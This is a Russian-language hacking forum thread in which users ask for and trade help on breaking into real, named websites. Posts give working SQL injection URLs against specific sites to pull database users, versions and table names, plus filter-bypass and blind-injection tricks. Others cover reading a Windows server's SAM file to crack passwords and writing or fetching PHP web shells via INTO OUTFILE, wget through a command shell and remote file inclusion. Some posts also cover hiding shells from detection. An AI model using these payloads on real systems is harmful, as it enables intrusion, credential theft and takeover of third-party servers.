rootmd said:
в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер


я имел ввиду папки, которые видны из веб


Gorev said:
с чего ты взял что там чмод 777 ?


спроведливый вопрос.

rootmd

это когда phpmyadmin стал показывать chmod?

Народ, чем брутить SQl inj вида

1'+and+'1'='1

Вроде есть тулзы для брута через substring()? кинте в лс плиз

я знаю что там chmod 777 потому-что юзеры могут залить картинки там.

rootmd said:
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.


не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал

хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

имеется

1. sql injection, под суперюзером

2. phpmyadmin, нормальный юзер

rootmd said:
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер


1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..

eclipse

http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat( version(),floor(rand(0)*2))having+min(0)+or+1--+

версия как бы намекае

http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--

Version4.1.22-Max

Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net

DB db1081176_stiga_table_tennis

так что брути таблы...

upd

~d0s~ опередил )

Что за скрипт умет находить шеллы?

И что можно сделать что бы не детектил..

Заливаю на сайт шелл , на следующий день его нет.

В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))

админ дебил попался значить ))

протроянь скрипты и не забудь про команду touch =)

очень часто поподаются бд из которых выводится только

CHARACTER_SETS

как быть в таком случае?

http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--

qaz said:
очень часто поподаются бд из которых выводится только
CHARACTER_SETS
как быть в таком случае?
http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--


facepalm !!!, испортил настроение ...читай школоло мануалы..не забудь остановится в разделе про LIMIT ...откуда вы беретесь...иди лучше уроки готовь и пиши сочинение "как я провел новогодние каникулы"

qaz

Как бы воут,почитай факи.

http://www.feb.spb.ru/news.php?id=100+union+select+1,group_concat(table_ name),3,4,5,6,7+from+information_schema.tables--+

Если кому не трудно - поясните мне такую ситуацию


http://www.mibf.ru/index.php?id=-1%20UNION%20ALL%20SELECT%20null,%20null,%20NULL,%2 0NULL,%20null,%20null,%20null,NULL,%20NULL,%20NULL +--+


Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал, почему это случилось, что это и с чем это едят, за ранее благодарю ))

eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))


не понял о чем ты, но там блайнд иньекция

eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))



потому что

includer.php

снанил сайты и попался такой:

http://www.sonicscience.com/store/index.php?id=0+uNioN+alL+sEleCT+1--

можете сказать что тут "уязвиного" ? как то я ничего не видел там.. но прога выдает, как уязвимым.

B1t.exe

там ничего нет.

и давайте не будем обсуждать подобного рода, и будем больше использовать свои знания.

Доброго. объясните темному пожалуйста, куда копать в таком случае:

https://secure.webblake.com/ShoppingCart569.php?k=query_here

http://gyazo.com/0091ab8d26c29151224a02582e76c46a.png

не выводит ошибки вовсе. только саму квери если битая.

в тоже время параметр учавствует в 2х запросах, и вывести его, чтобы не вызывало ошибки - не могу.

eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))


http://www.mibf.ru/index.php?id=-1+union+select+null,null,null,null,null,null,null, user(),null,null--+

И в адресной строке ты увидешь:

http://www.mibf.ru/mibf@localhost

Ну ты понел...

Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))


naprimer vot tak :


/news.php?id=2+union+select+0,1,group_concat(0x3a,t able_name)+from+information_schema.tables+where+ta ble_name+like+table_name-hex

привет залил команду через бд, получился файл shell.php





подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть

xxx.narod.ru/1.php

прочитай про wget или fetch )

noviyuser said:
привет залил команду через бд, получился файл shell.php
подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть
xxx.narod.ru/1.php


http://site.ru/shell.php?cmd=wget http://xxx.narod.ru/1.php

Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))


Раз у тебя столько баз,значит и mysql скорее всего тоже доступна.

Значит пробуй лоад_файл,ищи пути,когда найдешь проверяй файл_прив и если все ок то лей шелл.Если не вышло,попробуй найти пыхпмайадмин,сбрутив хеши майскул юзверов.

docw_p

Так не получится, так как столбцы имеют вид, который был предоставлен Nightmarе.

Nightmarе

В таких случаях можно сделать примерно так


Code:
select distinct(table_name) from information_schema.columns where column_name like '%user%'

Где символ "%" справа и слева означает, что слово "user" может быть и в начале, и в середине и в конце колонки.

Но я бы искал не по слову "user", если тебя интересуют все пользователи, а не только форума, а по паролю запросом вида:


Code:
select distinct(table_name) from information_schema.columns where column_name like '%pass%'

Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))


я бы сделал вот так, если по каким то конкретным именам таблиц:

SELECT group_concat(table_schema) from information_schema.tables where table_name=0x...

либо если не слеширует то через Like

Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))


-1'+union+select+group_concat(table_schema,0x2d,tab le_name,0x2d,column_name),2+from+information_schem a.columns+where+table_name+like+'%user%'+or+column _name+like+'%user%'--+

Я часто делаю так: заменяю все цифры на user(), затем открываю исходник и ищу по символу @. М.б. ламерский способ, но меня выручал всегда.

Кста, в твоем примере там ты указываешь null, а надо цифры.


Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))


Скорей всего, у тебя есть доступ к базам (обычно можно получить только имена) других сайтов на этом серваке.

eclipse said:
null я там указал чтоб хоть что-то показывал, когда просто цифры - ничего не показывается, а тут - во как много всякой всячины)) спасибо за метод, как нить заюзаю))
--upd-- к вопросам
есть такая скуля

Code:
?location_id=1' union select 1,2,3,4,5,6,7,8,9,10+--+*/

уязвимы столбцы 1 и 4
пытаюсь подставить имена столбцов

Code:
?location_id=1' union select name,2,3,4,5,6,7,8,9,10+--+*/

Отвечает ошибкой

Code:
Error: Bad query. Unknown column 'name' in 'field list'

пытаюсь так:

Code:
?location_id=1' union select table,2,3,4,5,6,7,8,9,10+--+*/

отвечает ошибкой

Code:
Error: Bad query. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table,2,3,4,5,6,7,8,9,10 -- */' ORDER BY `location_name`' at line 1

Значит ли это что в таблице есть столбец с именем table и это имя (table) как бы фильтруется? или че за фигня?
Я к этому пришел когда попытался прочитать данные из information_schema и нифига у меня не вышло
ссылка на уязвимый сайт
http://www.elephant.se


http://www.elephant.se/location2.php?location_id=513'+union+select+1,2,3, table_name,5,6,7,8,9,10++from+information_schema.t ables--+

иди млять и читай мануалы по скулям, сколько можно постить бред..и спрашивать то что уже миллион раз в данной теме перемалывали...стандартная скуля...нормально составь запрос...

Зашёл в тупик: есть слепая инъекция. Не могу понять, то ли фильтруется from, то ли нет доступа к information_schema. Как определить?

первый способ это просто брутить таблицы в данной базе чтобы определить работает ли from, но этот метод далеко неэфективен причины думаю ясны.

Какие есть идеи

Seravin said:
Зашёл в тупик: есть слепая инъекция. Не могу понять, то ли фильтруется from, то ли нет доступа к information_schema. Как определить?
первый способ это просто брутить таблицы в данной базе чтобы определить работает ли from, но этот метод далеко неэфективен причины думаю ясны.
Какие есть идеи


Ну так сначала проверь версию, если не 5ая, то нету этой таблицы, есть 5ая, то проверь на доступность, бывает всякое.

Tigger said:
Ну так сначала проверь версию, если не 5ая, то нету этой таблицы, есть 5ая, то проверь на доступность, бывает всякое.


ну как бы я не настолько туп, чтобы спрашивать не проверив версию

Seravin said:
Зашёл в тупик: есть слепая инъекция. Не могу понять, то ли фильтруется from, то ли нет доступа к information_schema. Как определить?
первый способ это просто брутить таблицы в данной базе чтобы определить работает ли from, но этот метод далеко неэфективен причины думаю ясны.
Какие есть идеи


посимвольно в тулзе какой нить пробуй..

причём тут посимвольно? посимвольно я и ручками могу) тут же в другом дело: я не могу определить то ли доступ к information_schema закрыт, то ли from фильтруется

кто нибудь знает способ заливки шелла в дле 9.0?

Seravin

Допустим, запрос выглядит так:


Code:
id=if(ascii((select version()))=53,1,0) -- 1

Проверить на фильтрацию from можно двумя способами:

1) Поставить слово после комментария.


Code:
id=if(ascii((select version()))=53,1,0) -- 1 from

Если возвращается false, то from фильтруется

2) Запрос вида


Code:
id=if(ascii((select version() from (select 1)a))=53,1,0) -- 1

Если возвращает false (Либо нечто отличное от первого запроса, то тогда from фильтруется)

2kamaz

когда пишешь:

id = 1 -- работает

id = 1 -- 1 редирект

там както url обрабатывается ещё, т.к. когда id = 1 #, он пишет id=1/#/

я чёт хз чё они там вообще делают(

Слепую скулю можно раскручивать, вообще не используя комментарии. Так что, если сайт ругается, то используй второй запрос. Для него комментарий не обязателен.

А вместо id=1 # следует писать id=1%23

Это так, к слову)

2kamaz

сори, не обратил внимания) значит, походу фильтруется from. Какие есть способы это обойти, кроме

FrOM(пробовал)

/*!from*/ (тоже не пойдёт, используется mod_rewrite походу)

У меня вопрос про UDP(прочитал сейчас статейку про DDOS). И там было написано примерное следующее:

При TCP flood атаке нужно подключение к атакуемому серверу, а при UDP - не нужно. Залез на Вики,там тоже написано,что протокол UDP не требует подключения.

И вот такой вопрос: как можно ДДосить цель,не подключаясь к ней? В чем тогда заключается сама суть UDP атаки?

Monsieur said:
У меня вопрос про UDP(прочитал сейчас статейку про DDOS). И там было написано примерное следующее:
При TCP flood атаке нужно подключение к атакуемому серверу, а при UDP - не нужно. Залез на Вики,там тоже написано,что протокол UDP не требует подключения.
И вот такой вопрос: как можно ДДосить цель,не подключаясь к ней? В чем тогда заключается сама суть UDP атаки?


разница в протаколах tcp и udp в том что, для отправки данных между 2 хостами (через tcp) нужно сначало создать соединение(ну там icmp запросы и тп).

а для передачы данных через протокол udp не требуется создать соединения потом отправить данные, вы по прямому отправляете пакеты на нужный хост, и в результате этого передача данных осуществляется несколько раз быстрее чем через протокол tpc

Спасибо большое!

Через скуль-иньекцию в MySQL-5 вывел на страницу содержимое файла SAM от сервера под Win2003. Скопировав все эти крякозябры в текстовый файл, попытался скормить его SAMInside'у, однако этот вариант не прокатил. Каким образом можно чисто слить этот файл? Не важно из под винды или линя.

Chest3r said:
Через скуль-иньекцию в MySQL-5 вывел на страницу содержимое файла SAM от сервера под Win2003. Скопировав все эти крякозябры в текстовый файл, попытался скормить его SAMInside'у, однако этот вариант не прокатил. Каким образом можно чисто слить этот файл? Не важно из под винды или линя.


Знаю что есть в C:\WINDOWS\repair копия файла SAM и SYSTEM попробуй. Даже под админом нельзя кажется вытащить C:\WINDOWS\system32\config отсюда потому что системный процесс его блочит, надо загрузится под другой виндой т.е. второй или из под линукса, тогда даст скопировать.

noviyuser said:
Знаю что есть в C:\WINDOWS\repair копия файла SAM и SYSTEM попробуй. Даже под админом нельзя кажется вытащить C:\WINDOWS\system32\config отсюда потому что системный процесс его блочит, надо загрузится под другой виндой т.е. второй или из под линукса, тогда даст скопировать.


Конечно спасибо за лекцию о системе защиты файлов 'Security Account Manager' операционных систем WinNT-based и вариантов ее обхода, но я просто спросил, как можно скулей слить файл не покорежив его содержимое?) может curl'ом? Расковыряв базу mysql.user, получил пасс рута. Расшифровав его попытался подключиться к базе на порт 3306, но видимо удаленная работа с базой запрещена в настройках MySQL, поэтому этот вариант так же не прокатил. Сервак крутиться под WinServer2003, IIS6.0. Легко читаются файлы. Просмотрел my.ini и php.ini - ничего полезного... Есть еще какие нибудь полезные) файлы? Поискал на форуме по теме раскрутки скули под Win2003&IIS, но ничего подходящего не нашел. Не подскажите где можно почитать на эту тему какую нибудь статью или видео?

Chest3r said:
как можно скулей слить файл не покорежив его содержимое?) статью или видео?


что значит "не покорежив его содержимое"?

Konqi said:
что значит "не покорежив его содержимое"?


Значит идея такая. Через SQL-иньекцию прочитать файл SAM сервера, скопировать отобразившееся на странице его содержимое в Блокнот у себя, переименовать этот текстовый файл в SAM и открыть его в программе SAMInside для того чтобы заняться паролями. Проблема в том, что после копирования из браузера в Блокнот и сохранения его, SAMInside говорит, что файл битый. Видимо тут какие-то траблы с кодировкой либо при отображении в браузере, либо при сохранении в текстовик.

Chest3r said:
Значит идея такая. Через SQL-иньекцию прочитать файл SAM сервера, скопировать отобразившееся на странице его содержимое в Блокнот у себя, переименовать этот текстовый файл в SAM и открыть его в программе SAMInside для того чтобы заняться паролями. Проблема в том, что после копирования из браузера в Блокнот и сохранения его, SAMInside говорит, что файл битый. Видимо тут какие-то траблы с кодировкой либо при отображении в браузере, либо при сохранении в текстовик.


Пробуй вытащить с папки Repair (старый файл до смени пароля) мб поможет а сам SAM файл получить не получится он занять и открыть тоже не выйдет....имхо

пробуй залиться (если права хватит) и поднять RDP так проще будет ..

shell_c0de said:
Пробуй вытащить с папки Repair (старый файл до смени пароля) мб поможет а сам SAM файл получить не получится он занять и открыть тоже не выйдет....имхо


Люююди! Товарищи! Родимые! ААААаааа! Я ЧИТАЮ ФАЙЛ ИМЕННО ИЗ ПАПКИ C:\WINDOWS\REPAIR\! Я ЗНАЮ, ЧТО ИЗ ПАПКИ C:\WINDOWS\SYSTEM32\CONFIG\ ЕГО НЕ ВЫТАЩИТЬ, ПОТОМУ ЧТО ОН ОТКРЫТ СИСТЕМОЙ! Уже второй человек мне об этом говорит! Я же упомянул выше, что я знаю, что нужно открывать именно C:\WINDOWS\repair\SAM. Праздники же закончились!


пробуй залиться (если права хватит) и поднять RDP так проще будет ..


Подскажи, пожалуйста, где почитать о "заливке и поднятии RDP" посредством SQL-иньекции в скрипте находящегося под управлением MySQL5 базирующемся на Windows Server 2003? Спасибо!

Chest3r said:
Люююди! Товарищи! Родимые! ААААаааа! Я ЧИТАЮ ФАЙЛ ИМЕННО ИЗ ПАПКИ C:\WINDOWS\REPAIR\! Я ЗНАЮ, ЧТО ИЗ ПАПКИ C:\WINDOWS\SYSTEM32\CONFIG\ ЕГО НЕ ВЫТАЩИТЬ, ПОТОМУ ЧТО ОН ОТКРЫТ СИСТЕМОЙ! Уже второй человек мне об этом говорит! Я же упомянул выше, что я знаю, что нужно открывать именно C:\WINDOWS\repair\SAM. Праздники же закончились!
Подскажи, пожалуйста, где почитать о "заливке и поднятии RDP" посредством SQL-иньекции в скрипте находящегося под управлением MySQL5 базирующемся на Windows Server 2003? Спасибо!


Через MySQL залить можно, а вот выполнить нет.

Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так


Code:
SELECT c FROM t UNION ALL SELECT '' INTO OUTFILE 'путь_до_каталога_видного_и� �_веба/название.расширение'

и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo() ;

Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.

2Chest3r залей шелл , и потом пофантазируй как и что можно ...

напрмиер можно батник засунуть в автозагрузку и ждать ребута (или найти вариант ребутнуть сервак) или.... с шелла можешь уже поковырять все конфиги (если прав будет) и там уже будет видно ...

P.S мб словишь конфиги к ftp/ssh/etc...

Вобщем, дело сделано, но частично. Отдельное спасибо товарищам CodeSender, Ponchik и ornot!

А дело было так! Первоначально файл был прочитан путем хексирования в SQL-запросе - hex(load_file(0x633a5c77696e646f77735c726570616972 5c73616d)) , далее сохранил страницу в браузере полностью, открыл в блокноте, обрезал лишнее, а потом конвертировал всю эту муть в HEX-редакторе.

Далее файл успешно был скормлен программе SAMInside, однако эта программка как и следовало ожидать, еще и потребовала файл SYSTEM. Тут к сожалению облом - файл весит почти 4 мегабайта и на странице ничего не отображается. Есть какие нибудь идеи по этому поводу? Порылся по разным форумам, нигде не встретилось чтение большого файла через SQL-иньекцию.


Expl0ited said:
Через MySQL залить можно, а вот выполнить нет.
Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так

Code:
SELECT c FROM t UNION ALL SELECT '' INTO OUTFILE 'путь_до_каталога_видного_и� �_веба/название.расширение'

и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo() ;
Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.


Спасибо! Обязательно попробую.


shell_c0de said:
P.S мб словишь конфиги к ftp/ssh/etc...


О_о Классная идея! Почему раньше об этом не подумал... Спасибо!

я не знаю может ли такое даже работать, но попробуй например обрезать какнибудь.

substring(LOAD_FILE(''),1,1000) если получится то просто скрипт написать и вытащить потихоньку

ALIM said:
атипичная скуль, не могу разкрутить
http://www.masterpiecedistribution.com/shop/ultime_uscite.php?order_id=&id=22381 and 1=1 --


Как-то я не особо понял что там такого сложного


Code:
http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- 1

Вопрос про уязвимость

На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь

USERDEAD said:
На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь


у меня классная идея!!! залить php скрипт!

P.S если без шуток то залей шелл и порутай сервак )

NemTaq said:
вбил ковычку get запросом, появилась такая ошибка:
возможно ли провести атаку через эту ошибку?


да.......

следующий вопрос.

Имеем инъекцию, будем считать, что нам ничего не мешает раскрутить ее и получить логин,хэш админа.

Но бывает так, что эти действия бесполезны,т.к. админка находится не на самом уязвимом ресурсе, а на хостере, напримеР, http://www.vul-sait.com:2082/

То есть в админку нам не попасть.

Тут и возникают несколько вопросов.

Может быть все таки можно что то делать дальше?

Если не попасть в админку, то как посредством sql через инъекцию редактировать/слить БД, сделать дефейс ну и т.д....всевозможные действия..?

а может там всё таки просто есть админка, но ты её найти не можешь?

пускай даже я не могу ее найти.

Интересно, что можно делать используя sql

jecka3000 said:
пускай даже я не могу ее найти.
Интересно, что можно делать используя sql


если у тебя иньекция в запросе селект то можеш только "слить" как ты сказал выше. редактировать и тп ни как не сможеш

смотри file_priv у пользователя, если повезет сможеш еще файлы читать.

смотри права на базу mysql, ищи PMA..

больше ничего.

дефейсы на ачате не обсуждаются.

Есть запрос вида

/newslist.php?box=5

пишу newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+--


эот уже определил что 5 столбцов, выводит ошибку вида:



Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 92 in /ishop/www/tid1/newslist.php on line 35

А если без коментирования остатка (newslist.php?box=5+and+1=0+union+select+1,2,3,4,5 +)запроса то такую ошибку:

Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 95 order in /ishop/www/tid1/newslist.php on line 35

Warning: ibase_fetch_object(): supplied argument is not a valid Firebird/InterBase result resource in /ishop/www/tid1/newslist.php on line 36

Как дальше раскрутить это все дело?.. во всех этих моментах нету вывода куда либо кроме того где ошибки=\

NorB

/threadedpost1826253.html

Konqi said:
NorB
/threadedpost1826253.html


Огромное спасибо, мне нраааааавица ваше прикольна %) чета новенькое изучу%)

Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?

street16 said:
Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?


Не понятно. Жалуется он очевидно почему, потому что на сервере включен режим SAFE MODE, и владелец каталога куда заливается шелл отличен от владельца загружаемого шелла.

Непонятно то, почему у тебя исполняется как ты написал:

$a=5;echo $a

Тренеруюсь на локальном сервере в sql-inj

Вот такой запрос к бд в скрипте.


$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a


Делаю скулю так


%URL%?req=1+union+selest+1,2


И так:


%URL%?req=1+union+selest+1,2--


Ошибка:


Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in ...
ERROR 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'selest 1,2' at line 1


Если в скрипте прописать так:


SELECT `id`,`text` FROM `sqltable` WHERE `id` = '$a' union SELECT 1,2


То всё работает.

Столбцов в таблице 2, записей 3.

В чём моя ошибка?

ps: Использовал оператор group by всё нормально работает, а с union никак не хочет.

Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.

ххх.com/index.php?con=http://site.com/c99madshell

на страице открывает шелл , с моим сайтом. ТАк должно быть ?

потом перехожу

ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?

Если нада доп. инфа говорите.

pycmep said:
Тренеруюсь на локальном сервере в sql-inj
Вот такой запрос к бд в скрипте.
Делаю скулю так
И так:
Ошибка:
Если в скрипте прописать так:
То всё работает.
Столбцов в таблице 2, записей 3.
В чём моя ошибка?
ps: Использовал оператор
group by
всё нормально работает, а с
union
никак не хочет.


Вероятно, потому что в первом примере, ты пишешь selest, вместо select

Забыл поставить кавычку


Вот так


%URL%?req=1'+union+selest+1,2


и так


%URL%?req=1'+union+selest+1,2--


Всё равно те же ошибки.

UPD:

Redwood, точно

Спасибо.

Code:
$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a

Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е.


Code:
SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2

и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же


Code:
SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2

в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ.

помогите раскуртить

http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а

http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата

villagay said:
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата


собственно в чем проблема?


Code:
http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6, concat_ws(0x3a,user(),version()),8,9,10,11,12,13,1 4,15,16,17,18,19,20,21+--+

проблема в том что статьи про скули разучились читать(

Onkelz said:
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.
ххх.com/index.php?con=http://site.com/c99madshell
на страице открывает шелл , с моим сайтом. ТАк должно быть ?
потом перехожу
ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?
Если нада доп. инфа говорите.


Ну тут два варианта, либо это RFI, либо просто фрейм.

В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел.

Так что дай больше информации

РОсширение .php.

НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.

Onkelz said:
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.


Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?

Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?

Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.

Expl0ited said:
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?


До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь.

UPD: Залил) помогло добавления нулл байта после .txt)

СПасибо за помощь! Лови +

iget said:
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.


GetEngine.pl - скрипт для определения имени\версии движка

ТиЦ (https://rdot.org/forum/showthread.php?t=146)

подскажите как обойти фильтрацию минуса

делаю


id=1+union+select+version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion()+--+


поля версии не видно

делаю


id=-1


перенаправляет на главную страницу

noviyuser said:
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу


limit+1,1

noviyuser

зафелси запрос более мягко,

and+1!=1

and+1>2

and+verson()=user()

и тп.

если видны ошибки мускула, попробуй эррор бейсд.

noviyuser said:
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу


ну по всей же видимости


Code:
id=1+and+1=0+union+select+version(),version(),vers ion(),version(),version(),version(),version(),vers ion(),version(),version(),version(),version(),vers ion(),version(),version(),version(),version(),vers ion(),version()+--+

да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.

точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()

ни один из способов не помог

вроде не слепая пробовал

and+substring(@@version,1,1)=4

and+substring(@@version,1,1)=5

пробовал и так и так

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+

id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+

если ставлю кавычку или минус перенаправляет

link pls

noviyuser said:
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
ни один из способов не помог
вроде не слепая пробовал
and+substring(@@version,1,1)=4
and+substring(@@version,1,1)=5
пробовал и так и так
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+
id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+
если ставлю кавычку или минус перенаправляет


а как ты пришел к выводу, что там 19 полей?

Expl0ited said:
а как ты пришел к выводу, что там 19 полей?


order+by+19

на таком перенаправляет

order+by+20

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20

тоже перенаправляет

null тоже не помогает

noviyuser said:
order+by+19
на таком перенаправляет
order+by+20
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20
тоже перенаправляет


замени цифры на null

[upd] тогда кидай линк.

Глупый вопрос:

если я делаю запрос


Code:
www.xxx.ru/auth.php?id=1'

ничего не происходит, открывает ту же самою страницу,

То есть ' фильтруется?

/// Мдаа...

cheater_man said:
Глупый вопрос:
если я делаю запрос

Code:
www.xxx.ru/auth.php?id=1'

ничего не происходит, открывает ту же самою страницу,
То есть ' фильтруется?


действительно глупый вопрос. Вопрос очень странно поставлен, я затрудняюсь на него ответить.

Подскажите мужики как обойти фильтрацию FROM в sql injection

Хостинг на SpaceWeb

